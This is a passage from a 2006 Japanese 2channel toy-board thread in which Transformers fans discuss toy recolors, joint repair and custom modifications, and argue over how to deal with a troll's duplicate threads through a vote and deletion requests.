→マニアは海外版買う→欲しい人には行き渡る→いざニッポン展開!→一般層はキモロボに見向きもしない
って感じに…

98 :ぼくらはトイ名無しキッズ:2006/12/13(水) 23:06:02 ID:49zgoKGFO
俺はムービー版のリフレクターは三個買いする予定
もち日本版でネ!!

99 :ぼくらはトイ名無しキッズ:2006/12/13(水) 23:16:20 ID:qyG9Nbiy0
>>1削除依頼は?

100 :ぼくらはトイ名無しキッズ:2006/12/13(水) 23:23:24 ID:HclEhXBb0
>>95
クラシックよりは売る確率高いんだろうけどなぁ・・・
メタルスみたいに劇場で売ってくれると助かるな

101 :ぼくらはトイ名無しキッズ:2006/12/13(水) 23:31:40 ID:qyG9Nbiy0
>>1削除依頼は?

102 :ぼくらはトイ名無しキッズ:2006/12/13(水) 23:45:44 ID:GfLu6UJW0
つうか、展開するってダケでも発表してくれんと本当に>97だなw

デジモンセイバーズの超進化シリーズが3体で打ち止め食らって
劇場版やるのに新作トイ一切ない(劇場限定販売すら)って扱いだから
早くしないと変形トイの市場がますますなくなっちゃうぜ…。

103 :ぼくらはトイ名無しキッズ:2006/12/14(木) 00:06:58 ID:SUFe7RzQ0
>>90
マイ伝は子供でも遊べたと思う
アフォな水増しリペで自爆しなければ駄々余りも避けられたろうに

104 :ぼくらはトイ名無しキッズ:2006/12/14(木) 01:00:05 ID:/f314otZO
色変えもキャラが違えばまだよかったが、同一人物色変えは罪大きいよなー。
アニメの出来自体を大友の目で云々しなくても、
子どもって意外と同キャラが同時に並んだりとかの、劇中設定と矛盾する遊びかたしないし。


105 :ぼくらはトイ名無しキッズ:2006/12/14(木) 01:02:28 ID:GctUg8UE0
ID:qyG9Nbiy0をNGにすると乱立してる全部のスレがスッキリ見やすくなるのでオススメ。

これからしばらくは日付かわったらその都度NG推奨IDを報告するようになるのかな。

106 :ぼくらはトイ名無しキッズ:2006/12/14(木) 01:19:55 ID:7blXNbCg0
>105
とりあえず、乱立スレ(>57の@B)を1〜2行のレスで
2回以上ageたIDをリストして行くのが吉。
とりあえず今日は早速ID:+lJI5iGB0が、
行動からしてID:qyG9Nbiy0候補。

NG推奨ID:+lJI5iGB0

なお、この後携帯IDの奴から俺のIDがNG推奨されると思われw

107 :ぼくらはトイ名無しキッズ:2006/12/14(木) 01:31:44 ID:vzJOjYuA0
マイ伝の功罪

よいこのみんなが簡単に扱える玩具に戻した功。
同一人物色変え玩具を恒例化しTFの命運を定めた罪。

カーロボのゲルシャークの突っ込みは冗談と笑い飛ばせるものではなかった。
「何がパワーアップだ! お前たちのはタダの色変わりじゃないか!」

108 :ぼくらはトイ名無しキッズ:2006/12/14(木) 02:11:43 ID:/f314otZO
仲間キャラのパワーアップも、主役みたいに増加装甲や追加合体にしてくれれば
上期のおもちゃを無駄にさせず、かつ拡張性をもって買わせられるんだけどな。

でも戦隊も一時期のパワーアップ合体から、(たしかカクレン以降)
新ロボ乗り換え型に移行しちゃったし
面白みを無視すると、商業的には単品売り切り・商品入れ換えが儲かるんだろうか。
ただ戦隊(乗用ロボ)にはない、TF(ロボ=人物)の問題としては
同一キャラを別商品(リカラーに限らずリデコや新造でも)にパワーアップさせちゃうと、
前のおもちゃは設定上、完全に不要になるのがあまりに痛い。

109 :ぼくらはトイ名無しキッズ:2006/12/14(木) 03:06:28 ID:GPmpS4L70
話ぶった切ってなんだけど、
そろそろロディマスコンボイのリメイクが欲しいと思う人はいないか?
スパリン版ではなくクラシックで。
ホットロッドではなくコンボイとしてのリメイクが欲しい。

110 :ぼくらはトイ名無しキッズ:2006/12/14(木) 03:26:48 ID:cDhG2ErCO
タイタニウムで出んじゃん

111 :ぼくらはトイ名無しキッズ:2006/12/14(木) 05:09:54 ID:dTu8NC110
タイタニウムってなんであんなに出来悪いん?
ファンの下手な自作かと思うくらい・・・

112 :ぼくらはトイ名無しキッズ:2006/12/14(木) 11:41:21 ID:+6eFV0ZW0
マイ伝期の商品は総じて顔がよろしくない気がする。

113 :ぼくらはトイ名無しキッズ:2006/12/14(木) 11:47:36 ID:/f314otZO
>109
クラシックに限定しなくてもいいんじゃない。
発表・発売済みの後もクラシック続いたとして、連中にフォーマットあわせるとすると
またぞろコンテナなしのボイジャーとかになっちゃって、既発RODIMUSとの差別化が難しそう。
クラシック的なセンスで、もっと色んなキャラつくってほしいとは思う。

>111
中には出来いいのもあるけど、全体的にはタカラが絡まないとどうもな。
写真で見る限り、ロデプラはあれで差し換えがなければ俺的に及第点。

つかコストを意識する必要がないぶん、ファン自作のほうがマスプロ製品より
凝った作り方できたりもするなw

114 :ぼくらはトイ名無しキッズ:2006/12/14(木) 11:50:40 ID:8t5GEBzc0
>>104
そういうもんなのか?
俺はガチャとか食玩のダブりを兄弟とか分身にして遊んでたが

115 :ぼくらはトイ名無しキッズ:2006/12/14(木) 12:04:30 ID:x68rNijf0
小遣いでほいほい買える程度の商品ならともかく、
2000円台以上のオモチャで、色しか違わんのを
もう一個欲しがるお子様がいるかというと・・・
ってことでしょ。

スパリンの初期デストロンでまたもや色違いの
アイアンハイド・サンスト・提督と出しちゃって、
あれが致命傷になった気がする。

116 :ぼくらはトイ名無しキッズ:2006/12/14(木) 12:31:52 ID:NxHKJhpw0
俺は小学生の時、TF大好きだったがさすがにG1ジェットロンは1つしか買わなかった。
色の好みでスカイワープを買ってもらったが、子供ながらに同じ商品買うよりも
違う変形する玩具の方がよかったし、なによりも年に数個しか買ってもらえないのに
色違いなだけの同じ商品なんてイラネ。
って思ったもんだ。

117 :ぼくらはトイ名無しキッズ:2006/12/14(木) 12:52:43 ID:O58Wth7H0
それが結論だろうな

118 :ぼくらはトイ名無しキッズ:2006/12/14(木) 13:00:02 ID:4KG2yano0
>>57
長文だったので軽く読み飛ばしてしまってたスマヌ

>荒らしが喜ぶ結果(乱立、ファンが混乱、分散による過疎、そいつが立てたスレ毎回使う)
>を出すからずーっと粘着できてるわけで。

削除人さんが動いてくれるって事なら
Aに一票ですわ

119 :ぼくらはトイ名無しキッズ:2006/12/14(木) 13:01:33 ID:/f314otZO
> 年に数個しか買ってもらえないのに

子供市場を考えるのに、これは欠かせない視点だよな。
同型でもジェットロンみたいに最初から複数とか、後出しでもせめて別キャラなら
趣味で選べて親切って見方もできるよなあ。
買ったお気に入りが半年後にリペられて、アニメでも「ひ弱だったボク」扱いじゃマジ泣けるよ。


> マイ伝の顔造形
とくにサイバトロンが総じて今市な気がする。
アニメ見てなかったんだけど、作画には似てたの?



120 :ぼくらはトイ名無しキッズ:2006/12/14(木) 13:13:53 ID:sXdMjg3l0
削除依頼スレで、重複スレのどれが本スレかを決めろだって。

http://hobby7.2ch.net/test/read.cgi/toy/1165403739/106

ちなみにこのスレはA

121 :モナクロン:2006/12/14(木) 13:33:46 ID:Js0gelFg0
   /> <\   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    | |    | | < なんつーか、キャラ付けが通り一遍で感情移入出来んのがな。
   \\ //   | たいして興味無い奴に強くなりましたと言われても、…なぁ?
     (´∀`)   \_________
      ◎

   /> <\   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    | |    | | < もう「実は漫画本のコレクター」ぐらいのふっきれた(でも
   \\ //   | ちゃんと真面目な)設定は海外版でしか見れんのかのぅ。
     (´∀`)   \_________
      ◎


122 :Masturbati©on:2006/12/14(木) 14:59:41 ID:jE5zUCfg0
目利きの古参モナクロンさんが御見立ゲストとして御越し下さったのでここで間違いなかろうと
っちゅう訳で儂は真スレはここかなっと想う
Aという事になるのかな?

123 :ぼくらはトイ名無しキッズ:2006/12/14(木) 18:56:05 ID:R3oXMAWI0
俺はここが本スレだと思ってるが

124 :ぼくらはトイ名無しキッズ:2006/12/14(木) 19:41:10 ID:rG3VW8qS0
俺漏れも

125 :ぼくらはトイ名無しキッズ:2006/12/14(木) 19:43:43 ID:7blXNbCg0
削除スレに、本スレ決め投票・集計を開始した旨告知しました。
http://qb5.2ch.net/test/read.cgi/saku/1107914801/336-337

上記に書きましたが、ルールは
 ・以下3つのスレッドのうち、本スレと思しき番号に投票してもらう。
 @http://hobby7.2ch.net/test/read.cgi/toy/1165403739/(ラートラータ氏)
 Ahttp://hobby7.2ch.net/test/read.cgi/toy/1165801486/(>333氏)
 Bhttp://hobby7.2ch.net/test/read.cgi/toy/1165837738/(ラートラータ氏)
 (番号はスレ立て順)
 ・12/15 0:00までの投票を有効票とし、ID数を集計して投票結果とする。
 ・純粋にID数のみ計上する。複数IDによる自演の可能性は当然あるが、
  それによる恣意的な有効票・無効票の判断はしない。
 ・番号を集計するスレは、上記@AB内とする。

現時点最新の集計は、http://hobby7.2ch.net/test/read.cgi/toy/1165403739/125
それ以降の集計は、また後ほど。皆さんよろしくお願いします。

>123
勝手ながら、上記集計を始めました。差し支えない範囲でご協力お願いします。
Aに1票、ということでよろしいですか?

126 :TF集計 ◆OpCU5JYDuc :2006/12/14(木) 19:45:55 ID:7blXNbCg0
失礼。告知でsageもないだろう自分。
自分は失礼ながらしばらくageで参りますが、皆さんはご自身のペースでどうぞ。
もちろんスレ趣旨に沿ったTFのレスも活発にお願いします。

127 :ぼくらはトイ名無しキッズ:2006/12/14(木) 20:04:33 ID:+6eFV0ZW0
じゃあAに一票。
&こういう得にならない役回りを進んでやってくれる人に感謝。

128 :ぼくらはトイ名無しキッズ:2006/12/14(木) 20:53:07 ID:zoY8RL790
ホントここまでの事になるのは珍しいな。まとめ乙。
こんな集計本来ならやらずに済むに越したことは
無いんだろうがまあ意思表示としてこのスレを推しとくよ。

129 :ぼくらはトイ名無しキッズ:2006/12/14(木) 21:12:59 ID:T5nOYFBp0
漏れもAに一票。集計人さんがんばれ。

130 :ぼくらはトイ名無しキッズ:2006/12/14(木) 21:14:05 ID:T5nOYFBp0
スマソ・・・あげてしまった・・・orz

131 :ぼくらはトイ名無しキッズ:2006/12/14(木) 21:33:54 ID:zoY8RL790
つーか雑談してもいいんだったか。
んじゃTFの関節がユルユルになってきて自立とか
難しくなってきたんだけどどうすればいい?

132 :ぼくらはトイ名無しキッズ:2006/12/14(木) 21:38:35 ID:4s25l8pa0
Aに一票でよろしくっす

>>131
大抵は瞬着で補強すれば良いんじゃないかな?
ボールジョイントじゃなかったら分解とかで少し面倒だけど。
クリックが入ってる関節だったら、どうすれば良いのかは解らない…orz

133 :ぼくらはトイ名無しキッズ:2006/12/14(木) 21:41:40 ID:2joyNPXH0
Aに一票&集計の人乙。

>>131
間接に瞬間接着剤を垂らして乾くまでグリグリ動かすといいぞ

134 :ぼくらはトイ名無しキッズ:2006/12/14(木) 21:46:29 ID:+6eFV0ZW0
JRXの股関節を強化した時は、
クリックの受け側を両面テープで底上げしたっけな。

ボールジョイントなら木工用ボンドがいいと言う話もある。
何をつかうにせよ塗りすぎると受け側が割れるので、チョビチョビ試すといいよ。

135 :ぼくらはトイ名無しキッズ:2006/12/14(木) 22:10:32 ID:zoY8RL790
>>132-134
トントンやっぱ瞬着か。
コンボイとかメガザラックとか比較的デカものが多いし
要分解なとこもあるな…まあ頑張る。

136 :TF集計 ◆OpCU5JYDuc :2006/12/14(木) 22:10:49 ID:7blXNbCg0
ageで失礼します。あと2時間弱ご辛抱下さい。

集計を更新しました。過不足あればお申し出下さい。
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/135

137 :ぼくらはトイ名無しキッズ:2006/12/14(木) 22:12:43 ID:5zmLc6Vl0
Aに一票
集計の人頑張って下され

ノイズメイズみたいな材質のボールジョイントなら湯煎で回復、と過去スレにありましたね


138 :ぼくらはトイ名無しキッズ:2006/12/14(木) 22:31:06 ID:RPShBWtPO
Aに一票ッ! 電話からでも大丈夫かな?

>>137
あのテクは鈴屋で買ったラートラータの股関節にもかなり有効だった。
もし緩い人がいたらやってみるべし。

139 :ぼくらはトイ名無しキッズ:2006/12/14(木) 22:46:00 ID:2joyNPXH0
>>133で投票しておいてなんだが

おもちゃ板自治議論スレッド
http://qb5.2ch.net/test/read.cgi/sakud/1080141499/l50

投票はこっちでやった方がいいんじゃ?

140 :ぼくらはトイ名無しキッズ:2006/12/14(木) 22:53:08 ID:7UJgLn4o0
こういうのって普通のスレでの投票結果でも反映されんのか?
一応Aに投票。これ機種依存文字だけど、macの人は大丈夫なんかな。

141 :ぼくらはトイ名無しキッズ:2006/12/14(木) 23:06:40 ID:H9KXe8qV0
あっちはGFで何故か盛りあがってるけど、
何故かスレ乱立しはじめたときに限って
初心者がやってきて今更な話題が各スレで始まるよね。
無駄ぽいけどAに一票しとく。

>>139
そこ見るとやっぱりというかなんというか、
どっちみち削除人さんは華麗にスルーする気がしてきた。
前につっぱねた人も議論しろったって、
なにをもってスレ住人の総意とする気だったのやら。

142 :ぼくらはトイ名無しキッズ:2006/12/14(木) 23:14:13 ID:EbHeXbrq0
地軸(=ボールが飛び出ている)方向につぶれてしまわない程度に圧縮するとか、
赤道に目打ちでもなんでもいいから、強く押し付けてマクレを作ってやるってのもありかな。

ちょっとむずかしいけど

Aを推しておきます。

143 :ぼくらはトイ名無しキッズ:2006/12/14(木) 23:33:56 ID:qMR7SP5K0
あっちのスレ、無理やり話し切り出す奴が居て笑える。

144 :ぼくらはトイ名無しキッズ:2006/12/14(木) 23:50:28 ID:KjoH1vOW0
いかにもゲロらしいな

145 :TF集計 ◆OpCU5JYDuc :2006/12/15(金) 00:10:54 ID:K8vLJ/PQ0
0:00時点にて、投票を集計しました。
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/154
ご協力ありがとうございました。

146 :TF集計 ◆OpCU5JYDuc :2006/12/15(金) 00:59:02 ID:K8vLJ/PQ0
http://qb5.2ch.net/test/read.cgi/saku/1107914801/339
以上、報告をしました。
@のスレ、並びBのスレは、TFスレ住人意見としては削除対象と見なされます。
あとは削除人の対処にすべてお任せします。

2ch初心者(笑)の私の独走に、賛否取り混ぜお付き合い頂いた事を
スレ住人の皆様に感謝します。
何人かの方にご指摘頂いたとおり、拙い企画運営ではありましたが
「特定荒らし以外は皆まとも」という、至極当たり前の結果が
正しく導かれたことに胸をなでおろしています。
実際の削除行為がどのような結果になるかはともかく、この投票結果により
特定1名以外の皆様とは、今後もよきTF仲間でいられることを確信しました。

以後、@Bの各スレに、同トリップをつけて細々と定期誘導しようかと思います。
また、次回の出番がないことを祈っておりますが、
またの乱立の際には、なにがしかのアクションを起こします。

と、いうわけで…

”ここが本スレです"

147 :TF集計 ◆OpCU5JYDuc :2006/12/15(金) 01:06:34 ID:K8vLJ/PQ0

>139
ご教授ありがとうございます。
途中で個レスはなるべく控えていましたが、最後にお礼を。
今後(そんな機会がないことを祈っていますが)
何らかの運営議論を起こすときには、そちらの利用を
優先的に考えることにします。

…そこに記されたレスの数々に、不安はありますが…。

148 :ぼくらはトイ名無しキッズ:2006/12/15(金) 01:09:14 ID:CXwCP/7i0
誘導
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/

149 :ぼくらはトイ名無しキッズ:2006/12/15(金) 01:09:49 ID:o+KmGjRo0
>>140
安心しろ。ちゃんと(月)って見えてるから。
○付き数字が(日)(月)(火)…
ローマ数字が(特)(監)(企)…
ぐらいの解読は出来る人は多いんじゃないかな。

>>145
乙。俺は投票出来なかったけど、人がばらけずに話が出来ればそれでいい。

150 :ぼくらはトイ名無しキッズ:2006/12/15(金) 01:23:17 ID:G24ZwoVJO
本日のNGID:CXwCP/7i0=oSmv1B3SO

毎晩同じ行動ご苦労様。
ちなみにID:lC5ZouRHO=BqnY6ZDG0=qyG9Nbiy0=jselX/y/0と同じ奴な。


151 :TF集計 ◆OpCU5JYDuc :2006/12/15(金) 01:30:27 ID:K8vLJ/PQ0
>149
ご報告ありがとうございます。削除の方の結果も出るといいのですが、
とりあえずやる気でまとめれば、意見がまとまることは分かったので、何よりです。
機種依存、次があったら避けますね。

>148
長らくお付き合い頂き、ありがとうございました。

152 :ぼくらはトイ名無しキッズ:2006/12/15(金) 01:31:57 ID:SOl17ENO0
>>151
超乙。

153 :ぼくらはトイ名無しキッズ:2006/12/15(金) 01:38:32 ID:Wlg3MoQN0
>>151
なかなかよいマトリクスをお持ちで
かつて無いほど乱立からの収束がスッキリしてたな

つうわけでスッキリ纏まった司令官強化合体をみんなで挙げ・・・・・

そんなもの無い事に今気が付いた
俺はマイ伝マグナジェットが顔の造形以外好き

154 :ぼくらはトイ名無しキッズ:2006/12/15(金) 01:55:57 ID:G24ZwoVJO
ギャラコンスーパーモードは、幼い自分にプレゼントしてあげたいな。
ゴッドジンライがやりたかったことをすべて実現してる気がする。
もちろん昔の俺は、初めてゴッド合体させたとき飛びあがって喜んでいたけどな。

超好きなんだけど、スーパーモードで完結してるから除外か・・・。

155 :ぼくらはトイ名無しキッズ:2006/12/15(金) 06:56:46 ID:gSI5K89a0
強化合体後に中盤の合体戦士やスーパーモードの部品が余るのは残念な感じだったな。
マイ伝のコンテナは基地モードで一緒に飾れるけど。
ただ画像掲示板参考に、オメコン+ウィングセイバーとか
ソニコン+スーパーの翼の合体もできるとわかってから急に皆好きになったよ。

156 :ぼくらはトイ名無しキッズ:2006/12/15(金) 07:31:19 ID:tTboLjmY0
>>146
とりあえず一旦、乙〜

ここしばらく削除依頼の話とかになっても立ち消えになってたので
こういう音頭をとってくれる人は貴重なので応援しますですよ。

来年はTF映画化とか色々ありそうだから皆で楽しく盛り上げて行きたいしね。

157 :ぼくらはトイ名無しキッズ:2006/12/15(金) 07:35:36 ID:tTboLjmY0
>141
>何故かスレ乱立しはじめたときに限って
>初心者がやってきて今更な話題が各スレで始まるよね。

俺も気になってた。かなりの頻度でそのパターンあるよね。
住人が親切だからかそのレスだけ伸びて他は有耶無耶にって。

158 :ぼくらはトイ名無しキッズ:2006/12/15(金) 08:19:30 ID:qhiZ+k1i0
ttp://tformers.net/g/albums/6881/DSC07065.JPG
お約束
だが欲しいぞ

159 :ぼくらはトイ名無しキッズ:2006/12/15(金) 09:55:56 ID:b+6ggXD70
マイ伝以降3作のは強化合体と言うより武装変更に過ぎないんだよな。
(例外:ウルトラマグナス、ライガージャック)
2人分のスパークで稼動していると考えれば単独パワーアップよりは強くなる気がしなくも無いが。

グランドコンボイ
├スーパーモード:多目的仕様
├ウイングコンボイJ:空戦仕様
├ウイングコンボイC:砲戦仕様
└オメガコンボイ:重格闘戦仕様

と目的によって合体形態を選ぶという脳内設定。
必ずしも スーパー<ウイング<オメガ とは限らない、と。

160 :ぼくらはトイ名無しキッズ:2006/12/15(金) 10:00:56 ID:8vJRaFy20
スパリンは全員スクランブル合体にすれば良かったのにと思う

161 :ぼくらはトイ名無しキッズ:2006/12/15(金) 11:47:42 ID:EHS4Z4ad0
>>158
白いボディに青クリアの窓はすごく映えるな。
何気に肩のエンブレムついてるし。
そして何気に膝の変形を忘れている。

162 :ぼくらはトイ名無しキッズ:2006/12/15(金) 12:03:58 ID:1MpavN0V0
>>160
せめて合体後は顔が変わってほしかった。ランドクロスの中ロボみたいに。

163 :ぼくらはトイ名無しキッズ:2006/12/15(金) 17:12:36 ID:Sw0SIvpI0
巻き添えアク禁やっと解けた
本スレが決まったようなので投下
ttp://f59.aaa.livedoor.jp/~tfup/imgboardphp/src/1166110413287.jpg
とりあえず頭部だけ完成
ちゃんとストリークに見える?

164 :ぼくらはトイ名無しキッズ:2006/12/15(金) 21:56:47 ID:4tXtXHeZ0
立派なプロールだね。

165 :ぼくらはトイ名無しキッズ:2006/12/15(金) 22:17:39 ID:/j55pZn30
本スレが決まったというのに何故か向こうのスレが盛り上がっている件

166 :ぼくらはトイ名無しキッズ:2006/12/15(金) 22:34:47 ID:K8vLJ/PQ0
>163
前スレあたりで改造宣言してたヒト? うp乙。
ツノは何で作ったの?

167 :ぼくらはトイ名無しキッズ:2006/12/15(金) 22:49:47 ID:CXwCP/7i0
誘導
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/

168 :ぼくらはトイ名無しキッズ:2006/12/15(金) 23:53:45 ID:6L3+1j8x0
>>165
あれが盛り上がってるって?
レス内容とIDを良く見るんだ

169 :ぼくらはトイ名無しキッズ:2006/12/15(金) 23:58:38 ID:55CCNF+Y0
あっちが本スレな気がしてきた

170 :ぼくらはトイ名無しキッズ:2006/12/16(土) 00:06:15 ID:8KVPsrM00
単発IDでひたすら一行捨てレスばっかりだね、あっち。
で、釣られてレスした連中が居ついて、結局削除されずにグダグダ、
といういつもの流れになりそうだな。

なんかなんでもいいから国内の来年の展開でも発表されないかな

171 :TF集計 ◆OpCU5JYDuc :2006/12/16(土) 00:12:12 ID:DiF6FYyF0
日付もかわったところで、本スレage。
この後1時間以内に重複スレをageる短レスがつき、
それに返事をする携帯レスがつき、
ageレスをしたIDがこのスレに重複への誘導をsageで張る。
その2つがNG推奨IDとして特定されるところまでが
削除人さんが何らかの動きを見せるまでの日課ってところでしょうか。

172 :ぼくらはトイ名無しキッズ:2006/12/16(土) 00:15:35 ID:e+FsJ5Uf0
運営はこの状況を楽しんでるなw

173 :ぼくらはトイ名無しキッズ:2006/12/16(土) 00:15:37 ID:Yi/ZcgFt0
燃えてるみたいだが、粘着に注意した方がいいよ。
削除人ですらあの荒らしに粘着されて、気が引けてやらなくなっちゃったんだからね。

174 :ぼくらはトイ名無しキッズ:2006/12/16(土) 00:20:39 ID:xr8kedP10
誘導
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/

175 :ぼくらはトイ名無しキッズ:2006/12/16(土) 00:26:32 ID:8KVPsrM00
前のどのスレ消して残すか議論しろ、って言った削除人も結局のところ、
関わりたくないから適当なこと言ってスルーしたんだろうな。

176 :ぼくらはトイ名無しキッズ:2006/12/16(土) 01:05:18 ID:NiBLlw850
何かさすがに熱くなりすぎじゃないかね集計人さん。
>>170の言うような毎回の流れになるのを危惧するのも
判るけどNG推奨だのはちょっと引いた。

177 :ぼくらはトイ名無しキッズ:2006/12/16(土) 02:13:37 ID:PrTI45N60
>>163
オートボルトをリペったと言うことは、
サーバートロン版スモスクと並べる気ですな。

178 :ぼくらはトイ名無しキッズ:2006/12/16(土) 02:54:53 ID:NVmyBBNq0
>>163
こういう風に作ってね
ttp://www.tfw2005.com/gallery/showgallery.php/cat/1209

179 :ぼくらはトイ名無しキッズ:2006/12/16(土) 08:21:05 ID:3iUdDneR0
>>175
>377 :阿梵明王 ◆HpcRk2ELiM 
>削除人の一人として回答します。 
>「無意味です。そんな代物を見せられても、処理判断には影響しません。」ということで。 
#そもそも、削除人の処理判断は「板住人の総意に左右されず」に行われることになってます。 
http://qb5.2ch.net/test/read.cgi/sakukb/1162228910/376-377) 

今回の件に関しての削除人からの反応だけど、これだと議論しろと言われて議論したって殆ど意味が無いことになる罠

180 :ぼくらはトイ名無しキッズ:2006/12/16(土) 09:14:09 ID:CMt0/beF0
おもちゃ板が全部TFで埋め尽くされても対応しなさそうだなw

181 :ぼくらはトイ名無しキッズ:2006/12/16(土) 10:26:30 ID:Qnj6R1+S0
>>179
普通、ここまで引用しないか?www
>378 :迷ったら名乗らない :2006/12/15(金) 01:36:25 ID:RUfX5Hz40
>あー、でも参考にすることはあるかもしれない。

削除人にもいろいろいるし、判断規準もいろいろ。
どうなるかは神の味噌汁 (ひろゆき

182 :ぼくらはトイ名無しキッズ:2006/12/16(土) 10:39:34 ID:ibjFitnA0
>>166
ツノはプラ板からです
>>177
クラシックの人達と並べるためにやりました
セイバートロンだとスモスクなのでストリークにしました
>>178
頭部だけ変えて楽しようと思ってるのでw
参考にしておきます

183 :ぼくらはトイ名無しキッズ:2006/12/16(土) 11:29:46 ID:r3QL3Xzi0
>>171
向こうのスレでも何度も貼り付けてるよね?そりゃ不自然な会話で無理やり保持してるっぽい
けど、どうせ無くなるスレだし放置しときゃいいじゃない。あれじゃアンタも乱立した奴と変わらんよ。
しかも削除依頼してるのなら、処理されるの待てば良かろうに。なんでそう焦るのよ?
ぶっちゃけココのスレを支持していたが、今じゃどちらが無くなろうと構わなくなってきた。

184 :ぼくらはトイ名無しキッズ:2006/12/16(土) 11:35:21 ID:4q/W1geP0
向こうのスレ、あからさまな自作自演で
いかにもTFの話題の盛り上がっているかの様に見せようとしているさまが
ひしひしと見て取れるね。

それに伴って、投稿数も増えているから削除人も迂闊に削除出来ないでいるってわけか、最悪だ・・・。

185 :ぼくらはトイ名無しキッズ:2006/12/16(土) 11:37:34 ID:zg2T/v4RO
>182
地の顔パーツを活かしつつもアゴとか細かく整形してて、違和感ないのがいいね。

実際GF商品とクラシック商品との差異って、キャラ付け(旧キャラ再現)とフォースチップ関連くらいで、
デザインそのものや変形・可動なんかの機構はほぼ同じコンセプトみたいに見えるから
GFで旧キャラ再現はかなり楽しいかもしれない。なかなか手を動かすところまで行く人いないけど。

186 :ぼくらはトイ名無しキッズ:2006/12/16(土) 11:42:04 ID:r3QL3Xzi0
>>184
そこら辺どうなんだろうね?まぁ結局は削除人の裁量による訳だし。
それより、二つのスレで誘導コピペをやりあう状況は関心せんな。

187 :ぼくらはトイ名無しキッズ:2006/12/16(土) 11:48:56 ID:4q/W1geP0
>>186
禿同。
漏れもここのスレに1票入れた者だが、今じゃ平和なスレになるのであれば何処でもいいと思ってきた。
削除人も、どこでもいいから削除して早くスレを1つに纏めて欲しいよ。

188 :ぼくらはトイ名無しキッズ:2006/12/16(土) 11:58:45 ID:kg7or5110
取り敢えずエネルゴンキューブでも飲んで落ち着け、オマエラ

189 :ぼくらはトイ名無しキッズ:2006/12/16(土) 12:03:38 ID:++gt4zDO0
いや、ワシ下戸だから…。

190 :ぼくらはトイ名無しキッズ:2006/12/16(土) 14:14:14 ID:PrTI45N60
平和な進行を望むなら本スレ議論を蒸し返すのはどうかと思うよ。
一応決まったことなんだし。
あと、投票した人間は一応その投票に責任を持つべきだとも思う。

まあ、削除自体がが行われなきゃいずれ有耶無耶になりはするだろうけど。

191 :ぼくらはトイ名無しキッズ:2006/12/16(土) 17:11:59 ID:J25CTVkq0
あっちのスレは乱筆が住み着いてるな。

192 :ぼくらはトイ名無しキッズ:2006/12/16(土) 17:14:33 ID:/263te/Y0
>>190
それは随分と虫の良い話じゃないのか?
反対意見は無視しますとテンプレにまで載せて、実際出た反対意見を全て無視して
強行したのに、削除人に一言されたら、今度は平和を望むなら蒸し返すなって・・・
それはあんまりだろ?
なら何時言えば良かったのだ?
投票と報告は、どのスレを残すかを選ばすだけで、その行為自体を否定する事は認めなかったくせに。
無責任にも程がある。
ご立派なのは、大口と時刻表示だけかよ。



193 :ぼくらはトイ名無しキッズ:2006/12/16(土) 17:16:16 ID:KOp/Qyiw0
toy:おもちゃ[スレッド削除]
http://qb5.2ch.net/test/read.cgi/saku/1107914801/344
保留だそうです…

194 :ぼくらはトイ名無しキッズ:2006/12/16(土) 17:35:56 ID:htZp37gz0
また放置されたか。まあ、一個消されただけでもマシなのかね

195 :ぼくらはトイ名無しキッズ:2006/12/16(土) 17:45:57 ID:33QRMWAQ0
>>193
当たり前。
しかも削除明王★は玩具板のスレ削除に通う削除人ではないから
次に見に来る可能性は薄い。
今回は自分の発言の責任をとる為に寄っただけだ。

>>181
知恵袋の名無しが何故 迷ったら名乗らない になってると思ってるんだ?
その板で名乗るって事は、こういう事なんだよ。
結果としてスレ削除を名指しでスルーさせた実績を与えただけ。

出しゃばり過ぎた真似をせず、余計なちゃちを入れず、無理強いしなければ何も起きなかったのに
わざわざスレを増やして、他所にまで恥を広げてこれが結果か?
ふざけるなよボケが!

過ぎたるは及ばざるが如しって言葉の意味くらい学べ。


196 :ぼくらはトイ名無しキッズ:2006/12/16(土) 17:54:24 ID:KOp/Qyiw0
削除人にも担当居るのね。知らんかった。

197 :ぼくらはトイ名無しキッズ:2006/12/16(土) 18:04:23 ID:33QRMWAQ0
>>196
担当という訳では無い。
犬の縄張りというか
動かない奴と、
同じ所をぐるぐる回ってる奴と、
その隙間隙間を縫って流離ってる奴がいるだけ。
玩具板は、どの犬の巡回ルートにもなってないので
放浪人のような名前からして流離ってる奴がたまに来るだけ。


198 :ぼくらはトイ名無しキッズ:2006/12/16(土) 18:28:35 ID:33QRMWAQ0
つまり来る削除人が毎回異なる流離い犬だから
板の内容に精通した削除人がいない。
もっとも玩具板に詳しい削除人が、放浪歴が長く
過去に玩具板住人と削除でもめた事もある放浪屋★だ。
(玩具である筈の変身サイボーグのスレを削除するの彼だけ。それくらい古くから流離ってる)
だから放浪屋は争いの酷いスレには関与しない。

なら知識に疎い他の削除人は、悩む削除依頼をどうする?
TF集計 ◆OpCU5JYDuc風に聞こうか?
 ・以下3つの削除判断のうち、正しいと思しき番号に投票してもらう。
 @とりあえず全て消す by海王
 A過去の削除人の判断を参考にする
 B削除人の大原則に則り 迷ったら消さない
 (番号は頭の悪い順)

だからTFスレは削除されない。
そういった過去から積み重ねた物を何一つ知らず、削除や自治の基本すら知らない奴が
突然大暴走して失敗を繰り返してるのがこのスレであり、今回の道化がTF集計 ◆OpCU5JYDucなんだよ。
と言うかこいつ本当にTFファンなのか?
コピペや煽りには積極的に参加してたが、TFの話にはほとんど参加してないぞ。
せいぜい戦隊の話に加わったくらいだろ?



199 :ぼくらはトイ名無しキッズ:2006/12/16(土) 19:09:03 ID:33QRMWAQ0
まだ文句言い足りない。

若削除★に文句つけてる阿呆がちらほら居るが、若削除★の判断が削除人の原則だ。
>迷ったら消さない
これを実践してるだけ。
迷ったから【消 さ な い】と字で著わしてしまうと
会話と違って相手に真意が伝わらず、二度と消さない事を宣言してしまう形になりかねないので
大抵の削除人は、その場合【様子見】って文字を使うのさ。
これなら 迷ったら消さない を実践しながら、余計なトラブルを避ける事が出来る。
様子見なら 次は判りません って意思に読み取れるからな。
政治家が【遺憾】って言葉を使いたがるのと同じだ。
